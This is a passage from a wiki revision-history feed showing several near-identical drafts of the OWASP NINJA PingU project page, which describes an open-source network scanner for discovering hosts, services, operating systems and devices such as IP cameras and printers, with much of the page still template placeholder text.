* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165239</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165239"/>
				<updated>2014-01-02T16:35:26Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU provides a set of functionalities to detect special devices within an IP address range such as IP Cameras, printers, web servers, SSH services and several others.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU uses raw sockets, non-blocking I/O, multithreading, caching, and other technologies to achieve a very high network performance.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165238</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165238"/>
				<updated>2014-01-02T16:09:34Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU provides a set of functionalities to detect special devices within an IP address range such as IP Cameras, printers, web servers, SSH services and several others.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU uses raw sockets, non-blocking I/O, multithreading, caching, and other technologies to achieve a very high network performance.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
As of XXX, the priorities are:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165237</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165237"/>
				<updated>2014-01-02T16:04:37Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
Write a short introduction&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Write a description that is just a few paragraphs long&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
As of XXX, the priorities are:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165236</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165236"/>
				<updated>2014-01-02T16:02:59Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
Write a short introduction&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Write a description that is just a few paragraphs long&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;a rel=&amp;quot;nofollow&amp;quot; class=&amp;quot;external text&amp;quot; href=&amp;quot;mailto:guifre.ruiz@owasp.org&amp;quot;&amp;gt;Guifré Ruiz Utgés &amp;lt;/a&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* Link to page/download&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map and Getting Involved =&lt;br /&gt;
As of XXX, the priorities are:&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
* xxx&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
